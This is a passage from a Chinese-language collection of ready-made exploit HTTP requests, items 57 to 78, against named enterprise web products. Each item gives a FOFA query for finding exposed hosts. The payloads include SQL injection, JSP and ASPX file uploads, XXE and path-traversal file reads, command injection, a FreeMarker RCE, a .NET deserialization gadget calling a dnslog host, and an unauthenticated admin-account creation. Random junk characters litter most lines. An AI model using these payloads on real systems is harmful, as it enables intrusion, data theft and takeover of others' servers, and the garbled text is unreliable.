"storeID":{# W0 X/ J" {$ |- z
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",- K2 b% d% O& j& ~. c# ^
"MethodName":"Start",
2 K+ M, U( J! o "ObjectInstance":{
, v/ l4 T3 x) j: A! q4 L "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",5 v2 P+ g. v+ l$ I1 `% s
"StartInfo": {
) {( D3 t6 Q" N, [! p "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",# e, C: _ {" r) ^$ B( D+ z; e
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
5 o F1 g8 |: b% f. C2 s+ }* m }
9 n3 L9 e% |4 p8 K V }- D% u4 @ ]9 r* W
}
" n+ W1 A/ ]5 M1 }' F; ]4 {}$ E# O6 Y: d; `
" B: Q N" d# g. L
$ A9 C3 P) D" Z3 h6 r d
57. 畅捷通T+ keyEdit.aspx SQL注入
# g# v. T1 T; C0 k; o9 O8 }; N- f' XFOFA:app="畅捷通-TPlus"0 v4 K! f" `+ D" J; \
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
# t+ U1 ]0 Q L0 Y9 }& e4 }9 ~Host: host
1 z" l/ f c" M6 `$ V; b; OUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ L* V- R4 w: u$ { @# I" H- f: `% u
Accept-Charset: utf-8
) @1 r3 ?/ M$ ^3 ~9 s5 nAccept-Encoding: gzip, deflate1 Y1 F2 M: _8 a' T
Connection: close
# V) b& x: Z. d3 w$ v
6 `; z, c5 Y) e& s& [+ `2 x0 ^8 j+ X5 N. I t, g" Z1 d
58. 畅捷通T+ KeyInfoList.aspx sql注入2 M( _3 D* N. u+ G8 Q
FOFA:app="畅捷通-TPlus"
$ _# U8 p; `; j; ^- N0 JGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.11 A, Q5 h; X5 q# ~
Host: your-ip
) Z1 a: r! W0 T3 S v9 [$ ZUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' `2 B. o6 F( y& m7 WAccept-Charset: utf-8
/ q( }: G! q7 _7 u7 w. s- |/ p' C; YAccept-Encoding: gzip, deflate- B1 v& l. y1 h; q% d" K
Connection: close7 ~7 E1 E/ f, ]
+ i) R$ x. J( u! K' A8 \% p
% O) h( z. N* ]& ?$ T( p
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行! ~) W* l1 c8 e# ?8 J# f0 q2 Y
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"- v5 R: H9 O( v9 O
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1; W# h: t; Y$ l( M Q: K) J, W
Host: 192.168.86.128:9090
- X% v- G+ }$ r6 x; V; A# T, XUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
0 B9 B. V/ e+ z2 G; f2 CConnection: close
# C2 _; [& j- J5 [4 w% MContent-Length: 1669
s' O3 G" X% O1 Y3 nAccept: */*5 C1 A- [& S( x9 H9 }! c+ C3 v
Accept-Language: en
. t, M" ^! g1 I! o# vContent-Type: application/x-www-form-urlencoded1 K+ E1 O+ H. \
Accept-Encoding: gzip
9 D3 U/ t! S' _9 J; A3 V3 _5 s! q3 O# L- V2 S9 X# C4 x. C
PAYLOAD# W' i' g. M' [# E7 |* a
. O2 _0 [. g Y4 X# H- B
: _0 ~6 u8 t+ X& y: u! N" b* H8 s( x60. 百卓Smart管理平台 importexport.php SQL注入
: B5 \1 O1 ?3 S- W% JFOFA:title="Smart管理平台"
9 z- T( X7 Z+ U( wGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.14 m# Q- q( ]! \" E
Host:; X) O* n- s8 h; V7 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, {9 o0 D- M! E. w/ E$ U# ]' \2 S, H9 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ \- c( W; Q& E6 b8 m: R
Accept-Encoding: gzip, deflate( p9 ^* @7 |3 O' l: ]
Accept-Language: zh-CN,zh;q=0.9
) f* n" ~0 e" O9 h9 e, qConnection: close
# C( `8 y) O2 b# Y& U- _ O3 r5 F0 `
3 E# Y- j" B0 N# Z- s, G61. 浙大恩特客户资源管理系统 fileupload 任意文件上传7 O; U4 r" e9 M* w Z
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
& d! g* m. }. d- E, \POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.12 Y4 j5 Y. s; H0 j: ]- x1 C* z
Host: x.x.x.x
* X7 m3 @2 _) R$ H. |. RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, M2 q* i' c- ?/ ^" C% E: |Connection: close
; W1 S, P9 l2 a+ B! z. J, eContent-Length: 27
# O4 G4 @/ O0 q2 l! nAccept: */*
b3 Q0 C: F5 }, [- P, HAccept-Encoding: gzip, deflate
1 } z/ x6 s* y" I$ B+ A! E; {Accept-Language: en8 ?' F1 A, H& v
Content-Type: application/x-www-form-urlencoded
, t, s( e( m3 o
7 A" q0 u7 j u N) n0 m4 v1 q' z8uxssX66eqrqtKObcVa0kid98xa* C. @+ `; N8 e# a3 H: a
* ^8 ?+ j) Z0 ^: p6 M1 j
) ^( [, [& L" r# L62. IP-guard WebServer 远程命令执行
: D5 E* Z! ^) s. X% [" Y1 d4 ]FOFA:"IP-guard" && icon_hash="2030860561"* \: F4 a4 i: u. c
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.19 ]# ~& ~( Q0 N+ a# Y' a
Host: x.x.x.x. H. O$ ~3 s4 ^3 A' k5 T' w
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
9 |" n9 m) l7 `+ U$ B$ Y! N; ZConnection: close
7 g o0 u) m" R7 n! U0 z# L6 TAccept: */*
: U* ~. o* A& |( oAccept-Language: en
7 N- [/ ~4 u) z- E( ~Accept-Encoding: gzip0 O1 b: |5 \ b- N7 z% C
. F! e' J% p1 Q' [- e6 ], D0 t
1 d# R1 z5 E0 k# U0 |! r e
访问
1 y+ i" {- i+ h! X
. X! |- M" o' Z- XGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
7 e: i" b) ?; u, P" A$ zHost: x.x.x.x& v, z7 l0 q; p, J4 z+ v
9 S( W c, _( [. i& ]/ U+ b% c* j
8 U6 b* \& h) o! s' k9 I
63. IP-guard WebServer任意文件读取1 M+ Z$ i4 v- L7 `' I6 K
IP-guard < 4.82.0609.05 U7 R P5 F" `- r* N2 O5 H/ k1 n
FOFA:icon_hash="2030860561"- V B, b0 _' q0 q/ D8 a$ N& q; P
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.10 `: t K0 }& }+ R+ ?1 o
Host: your-ip
( K g2 y n2 w# [/ _% IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ _* p) ~& c) g$ k* @2 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 e& i/ v1 |* W0 f0 ^7 u: u
Accept-Encoding: gzip, deflate; Y& v9 \) b* B
Accept-Language: zh-CN,zh;q=0.9( m: H3 l+ R! {0 t$ h; Z
Connection: close
2 W6 a" c9 ]1 h$ R4 \ YContent-Type: application/x-www-form-urlencoded, T- b' u5 N/ k* n
) e) X/ g. N g. z0 N9 H# z) C
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A3 {. Y1 T$ V1 E: S2 T+ n
# q6 I/ ?( L1 L: a& S5 F8 r
64. 捷诚管理信息系统CWSFinanceCommon SQL注入( Z; M* l+ b- d% J0 x e
FOFA:body="/Scripts/EnjoyMsg.js"8 @3 X2 _: s% K. M# R/ E8 ?
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.11 E* P1 E, T7 _& m
Host: 192.168.86.128:9001+ y, j4 x- f! c
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.363 T" g. a. ~& [1 V; h
Connection: close, J* L! D+ w: m9 y
Content-Length: 369
' s2 a' F7 w" \' [2 h" }$ NAccept: */*
# H% m3 \# \" H8 J6 aAccept-Language: en
, ~. v0 ?) M! L$ \& A4 l' TContent-Type: text/xml; charset=utf-8
' @+ N/ G$ l) E: E }Accept-Encoding: gzip" E% t2 `1 D9 R/ V- K7 Q( W
) g+ R y. Z$ x! _- `<?xml version="1.0" encoding="utf-8"?>
( [3 M m- o8 B5 L: o4 b<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- n5 A1 U/ o, P) v8 S7 O4 j9 r1 }
<soap:Body>
# f; p+ b8 v! K% F8 H <GetOSpById xmlns="http://tempuri.org/">
8 Z$ w; d( o4 }9 h/ z <sId>1';waitfor delay '0:0:5'--+</sId>
1 [+ {2 h% c1 c7 L+ T% p </GetOSpById>+ _' ~ o+ n3 N3 L
</soap:Body>
* p! }( ]1 ~ y/ r$ Y8 N: N! i</soap:Envelope>4 I# l- @; k6 ]' m9 ~! [
9 e, l$ e9 ?/ H
; {. D9 v5 ]! z& c8 U$ a- U! H65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过$ E1 v+ z' h5 }2 H4 |- Y
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
' ~( H! v* ?$ a# n: a2 v1 P: H响应200即成功创建账号test123456/1234564 k- w' i" l4 t3 v3 l
POST /SystemMng.ashx HTTP/1.1/ A4 y. k& w, k# y* X# X
Host:6 @% ]' \5 i5 H6 H$ w+ c
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)6 d) @, c$ P1 F) h5 O5 X- O
Accept-Encoding: gzip, deflate
& ?, G- M& t. M0 b4 uAccept: */*2 W( l. `# C5 t$ a' X# R7 t0 n
Connection: close1 q( |" W+ \2 `: V
Accept-Language: en, f: e9 O5 `* A/ n& P% ]+ s1 h: W% J
Content-Length: 174: P, [' r: }/ |9 _1 E7 T M
: F. h9 Q# v, h- R' y7 M1 s1 _operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators1 }: J9 e$ O. b0 \
. V2 j ]# E) ^. E- Q+ l* z8 c( P& V# X& u0 p* [; f
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入6 P* n7 ?2 _2 ^0 _$ k2 T0 Y
FOFA:app="万户ezOFFICE协同管理平台"; |) B) k7 c: n- j
1 E- H$ ?4 m) V, l' jGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
! v/ G$ w( C* ^' u9 P- ^# F& b* yHost: x.x.x.x
6 }- x7 s: ?, SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
- j, B1 ~/ X" j6 U0 x( yConnection: close
9 T% |+ u$ k! L0 N; _Accept: */*# ], s5 _" n3 J" \& w7 a
Accept-Language: en
" y0 y0 {( A% t& R4 l! k% X o$ QAccept-Encoding: gzip' F8 y! t; V8 ~* m* J3 f0 Z$ C
. F$ c/ H& u( W& X) o( j% s5 F8 q* {, a
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
) ]) I S. ^* H$ r/ X2 d6 R# ^) b+ w
67. 万户ezOFFICE wpsservlet任意文件上传! v+ Z/ q2 _- f: B9 V+ _
FOFA:app="万户网络-ezOFFICE"
9 O5 U( p6 F# ?5 N( rnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型* v7 F) h9 j) z- ]1 u. l
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.12 d2 I. c/ u+ R# r& [2 U" o
Host: x.x.x.x
h3 H* p/ z1 o* kUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0& \: q, v! `$ D5 _. h6 `( K" d) n7 G
Content-Length: 1736 ]# k1 ]+ U8 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. {2 E% _1 T7 j
Accept-Encoding: gzip, deflate
' }3 X9 y) a( p% A3 `* D t, FAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.39 J1 T5 S4 E R G9 \+ Z
Connection: close
( k ^) i' D, M+ m$ a2 v/ dContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp2 R# @. B7 s% b: q. X7 E
DNT: 1
; L/ g1 U `9 e: R, k# kUpgrade-Insecure-Requests: 16 B/ O8 G) ~: w
5 X N" ]8 F1 g' b, s; R
--ufuadpxathqvxfqnuyuqaozvseiueerp
: d& D- m2 [* Z" nContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"( D' j+ k: d4 U3 N, V, v* n
; f% W7 E# U& q/ h<% out.print("sasdfghjkj");%>3 N f4 f) v" @" _6 e3 C
--ufuadpxathqvxfqnuyuqaozvseiueerp--/ K' l) u Q# g
3 v3 ?0 l: L5 X. c; e9 A& a8 m4 d2 N5 s6 @& f* n( G
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp1 G/ k6 ~/ H% k# t: f
; t- d7 e2 A2 I$ m& ~
68. 万户ezOFFICE wf_printnum.jsp SQL注入, m4 N& v, N2 K: R+ g) _) K; B( J% g4 M
FOFA:app="万户ezOFFICE协同管理平台". F# D, Z1 H6 h! x% y" D
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
. `- M$ C. K5 ?/ X& W; pHost: {{host}}
9 |+ U5 L0 B0 ^3 t( c# sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.363 \0 M; c7 v$ T. Z
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.85 L" Y/ ~8 N, P% X4 @4 B) C0 `
Accept-Encoding: gzip, deflate
8 {- `) L& T7 |; g o, [; n2 H7 nAccept-Language: zh-CN,zh;q=0.9
/ l' M; h5 Z, x' s$ ]Connection: close
9 }1 h2 d6 ]6 ?5 I$ ^+ L5 L, C; G& A( P: r/ m4 P( _" d
$ r/ G9 q, a) L6 C) X/ J4 ?69. 万户 ezOFFICE contract_gd.jsp SQL注入
" ?, d5 @3 q1 n: e I+ u6 I* [0 YFOFA:app="万户ezOFFICE协同管理平台"
% E" ^- u) F; b/ N' QGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.12 _; j% U: r0 B- O/ t3 b+ n
Host: your-ip/ w H8 _$ V/ W' G- f
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 R7 d, S6 q7 S
Accept-Encoding: gzip, deflate X, z0 M9 J2 M' R8 `
Accept: */*
( K0 K% z3 e+ fConnection: keep-alive
1 F2 |( `. n' p2 p
# |( L1 n1 _9 k+ c, B; Q
% f/ u( x$ y) s70. 万户ezEIP success 命令执行
* m" U: V: K, D8 q1 H' LFOFA:app="万户网络-ezEIP"
! l' c* c! R. C0 G5 `9 _POST /member/success.aspx HTTP/1.1; B+ G% }; q7 U/ J5 x( d% i
Host: {{Hostname}}
- X$ A$ ?* G* m. ~/ X' [ tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
# Z4 ?3 l/ y. A: @6 t' h) w1 w5 }SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=: I" m4 S/ X2 t! A6 h
Content-Type: application/x-www-form-urlencoded
: A* |6 n% y4 {& ZTYPE: C- H9 o9 A' _. h7 o4 j% t0 s+ R
Content-Length: 16702
# N& V5 B; X1 _7 @: [* Q N5 H: f; L6 o9 C6 A
__VIEWSTATE=PAYLOAD
! y! `! X1 [$ v7 Q6 e9 h4 F- _
1 M* C$ U: N1 F$ v1 F6 c3 P" S1 k* V# w" I3 S
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入9 L7 l9 V# ?! m7 c
FOFA:body="PM2项目管理系统BS版增强工具.zip"
& k( d: F: O, Y) ?( a" GGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
3 m# ?, i' E7 U( _7 P# i8 oHost: x.x.x.xx.x.x.x
# w' R0 m2 K# yUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* Y2 u, a3 v' t4 i; V0 j8 k$ hConnection: close
; i3 q- j% o9 c0 k5 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ Q, e) Q* D3 F$ W5 G
Accept-Encoding: gzip, deflate+ Z& ]: a' s- g# B8 g& o+ ~% v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( Q" z8 |$ r7 b1 C: c+ X
Upgrade-Insecure-Requests: 11 k# x8 H$ u+ d# @" [( k
; x4 r4 ~3 M' D4 z# P
" g. |" ?- \2 |/ t$ i72. 致远OA getAjaxDataServlet XXE
; k2 d. p3 h( u0 K) E/ m1 ]FOFA:app="致远互联-OA"& j( Q( N2 U* }3 ]- m' q
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1/ w, F6 x0 f L6 d/ `
Host: 192.168.40.131:80992 m7 t( ^, V5 u! M! d
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
: w: T1 y5 N8 V/ zConnection: close u& ?+ y6 g3 \; {
Content-Length: 583# E& ~2 m& f) }
Content-Type: application/x-www-form-urlencoded5 J+ E7 O1 L* v+ A [7 h
Accept-Encoding: gzip: m* _7 S1 d7 J/ _1 ?. m3 j8 D
6 U4 R- g( D7 M2 O% r" O
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E" |/ i. f& G2 k$ \' Z
; t! i' J% m: Q n
) |$ D- |, j. S# m: c
73. GeoServer wms远程代码执行! Q) B. P( M. U+ U
FOFA:icon_hash=”97540678”4 M s1 N3 [7 l
POST /geoserver/wms HTTP/1.10 H; z: X8 V/ M! O$ B- u! }4 U- H. d
Host:' h; c$ r) w/ R% c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ C& }9 p0 T4 K. P* @! KContent-Length: 1981
% P- y u- |, {Accept-Encoding: gzip, deflate
' x6 Z5 K1 W6 |6 n( m1 y; sConnection: close
2 n& i8 Q1 ^3 I; Y/ x" UContent-Type: application/xml
d+ D! t% A T$ b) OSL-CE-SUID: 32 C0 S, m; N' p+ I V0 T
$ U1 N$ n Q2 H" _PAYLOAD H( A9 B& z2 y/ [* r3 {& b
+ Y' S( [$ _3 d' @6 [3 b& X: U" E+ V! @' ]) n
74. 致远M3-server 6_1sp1 反序列化RCE4 v( q* E/ f# _ L( }* x
FOFA:title="M3-Server") C0 k% N3 ]8 z# F7 } G
PAYLOAD. `9 u; D3 ?, p* x% R9 `
4 J9 s9 ^9 j+ D+ i* t$ k! T3 G7 j; ^$ J75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE, |* f/ |, V* c( ]' m
FOFA:app="TELESQUARE-TLR-2005KSH"1 F9 a; X% q: X
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
8 X6 U1 i& R! v6 K- S0 ^Host: x.x.x.x a7 O0 a2 b( i" U0 M& U& ]8 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 o4 n/ A0 `5 M' Y, U' CConnection: close
! C$ m, j$ U" G4 QAccept: */*0 a, H" ^. j6 m. G) T
Accept-Language: en& S* x( B5 y* Y5 F' Q( ]
Accept-Encoding: gzip; F2 h8 V. l' l; w
2 L/ a2 a. Q- }+ A1 O
e: i; W+ a a2 P4 y, R1 xGET /cgi-bin/test28256.txt HTTP/1.1
+ [* f8 s% k- \" c: ]3 DHost: x.x.x.x
2 O' V9 m* i7 y! q8 ` o; ?; V4 Z
9 ~$ Q. M: o9 t( [9 H8 y$ D. @2 P/ t+ D& o& u
76. 新开普掌上校园服务管理平台service.action远程命令执行6 d% f! G1 D# l) G
FOFA:title="掌上校园服务管理平台"$ w, L2 z; e+ d5 m
POST /service_transport/service.action HTTP/1.1
" y6 z. M3 l3 _1 PHost: x.x.x.x
0 M% l7 i& j; s7 U0 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
$ p0 T+ ]: M8 q9 A7 z* z5 j# _& JConnection: close
6 T; B* L1 p. o3 cContent-Length: 211) f: M0 f" N) |0 C* J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. z+ V2 z s* w0 Y: I- g# x; u5 cAccept-Encoding: gzip, deflate1 U: d* C7 W) F. Y# y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" U M+ K3 ~ v
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
: ^+ f8 p1 ~1 qUpgrade-Insecure-Requests: 1
$ O% v. j9 S- R. y* a4 F3 d
* \3 _. }0 a8 t' Q! Z% W' t{# M5 [8 r- C M, j: d
"command": "GetFZinfo",9 L6 N# n! T. _
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
6 T: m l# P. q ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
& b# b% f* f1 r}2 [' \ H4 N6 O8 W
6 K6 Q: S% R k( c' ~; e5 j. i. E5 d
2 |3 @! q$ J( fGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
9 G+ `+ r- i' Z$ G5 ZHost: x.x.x.x
3 z% b& {( y8 S. ^$ d1 ?$ b
% ~7 ~4 N# P$ j
# }+ X+ L1 _. r1 L$ B
/ I: N+ L( k) O! ~9 y! N77. F22服装管理软件系统UploadHandler.ashx任意文件上传
5 A& C! Z( j+ W$ o xFOFA:body="F22WEB登陆"
- @- ]- ] O P3 bPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.13 x q% f# T* X& R1 `, j& {" \ `) f
Host: x.x.x.x' a# \7 g! y3 ^, O- u* Q+ v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) T2 J5 K! B3 u# M1 E+ n9 d7 GConnection: close: b& @1 a4 {. s7 f: W
Content-Length: 433
4 U$ I* t! H# d4 ?2 _3 CAccept: */*/ h6 y& q7 p, v( q( H7 [
Accept-Encoding: gzip, deflate
0 b1 E4 ^! u2 E# V& eAccept-Language: zh-CN,zh;q=0.9
3 |$ P1 B: y) m% |! Q1 L$ DContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
- I5 X$ a1 G8 n/ N
3 L) y! @! S1 Q# r/ d! T5 A------------398jnjVTTlDVXHlE7yYnfwBoix; e9 _" W+ @& X5 q: f
Content-Disposition: form-data; name="folder"- i i8 s9 \; M) F* I
* b( B" L! ?/ O7 S( s2 {& z8 P
/upload/udplog* i9 G0 `' Q- j$ r' H
------------398jnjVTTlDVXHlE7yYnfwBoix- e( Z* l$ D& c% h2 a- Z
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
) t! |% j' o- \5 HContent-Type: application/octet-stream* u& A5 R; b; @$ F5 z- O3 F* D+ ~! y
$ {) J' O* H/ a$ q' n- I" W
hello1234567
' M; q `5 ^0 G- g------------398jnjVTTlDVXHlE7yYnfwBoix
- O$ U- P. E3 s3 eContent-Disposition: form-data; name="Upload"
+ p& s5 Z7 g; C. M
. |* |, u- Z1 I2 mSubmit Query2 z; D& d0 `' \4 l( b) Q
------------398jnjVTTlDVXHlE7yYnfwBoix--' v9 [ G2 }) B, s0 H2 P) R0 K: I) I. b
) H) o3 ^5 `4 k1 \8 u W% n2 N+ c+ P! L6 F2 W- d
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
2 V8 S h, M$ FFOFA:icon_hash="2001627082"
+ t3 i6 H4 i% `" o2 iPOST /Platform/System/FileUpload.ashx HTTP/1.1, K0 J( {% R" A& U8 U6 @4 a: ]
Host: x.x.x.x4 c9 Q- y: t9 q* R, v9 @0 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 v: b% l8 Z( J% \1 [% i+ V/ y
Connection: close6 Z7 N/ l8 K! Z3 ~1 T5 ], e
Content-Length: 3364 j! r% K0 U, l# e+ {$ _: C
Accept-Encoding: gzip& c9 n% m3 X( X
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
' {* p; b! [! m; |: u; b; A4 O* a2 y
------YsOxWxSvj1KyZow1PTsh98fdu6l9 R/ `( I; X5 C; H7 m0 Q4 W6 V+ \
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"2 N2 _. W) G7 E' X1 ^% X
Content-Type: image/png) H; Q! k% B3 G5 S( z* \
4 B# z! A& f3 ~% W/ @" {$ UYsOxWxSvj1KyZow1PTsh98fdu6l. e: p) x- z" T2 m" y. i* i! S
------YsOxWxSvj1KyZow1PTsh98fdu6l
, ?6 x- }5 J" w7 o0 ]+ Z' \Content-Disposition: form-data; name="target"3 \. \# U0 Q) O: P. ?8 ]( u9 ^
; h8 c9 m6 s' Z& F, B5 @2 R1 i
/Applications/SkillDevelopAndEHS/
* D! O5 {. w4 \. d& A# K+ b/ m9 G------YsOxWxSvj1KyZow1PTsh98fdu6l--1 e1 U- A, L) q
) A3 c$ ^/ V6 w9 u! t" K3 J$ ]& a9 r) `. s4 b3 e1 \
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
